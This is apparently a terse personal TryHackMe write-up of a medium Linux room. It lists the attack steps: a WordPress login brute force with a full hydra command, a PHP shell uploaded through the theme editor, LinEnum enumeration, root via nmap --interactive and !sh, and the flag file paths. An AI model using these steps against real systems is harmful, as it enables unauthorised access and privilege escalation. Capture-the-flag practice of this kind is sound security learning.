| Names | Details |
|---|---|
| Source | tryhackme |
| Level | medium |
| Os | linux |
Notes :
-
bruteforce: using worlist from robot.txt
-
worpress apperance php shell upload
-
exec php using the url
- linEnum.sh
- nmap --interactive
- !sh
- done
- hydra brueforce http-pot-form
hydra -L user.dic -p test 10.10.102.15 http-post-form "/wp-login.php:log=^user^&pwd=^pwd^:invalid username"- User flag : /home/user/user.txt
- Root flag : /root/root/root.txt
- something
**By Whois~TCP ** 🤓🖥️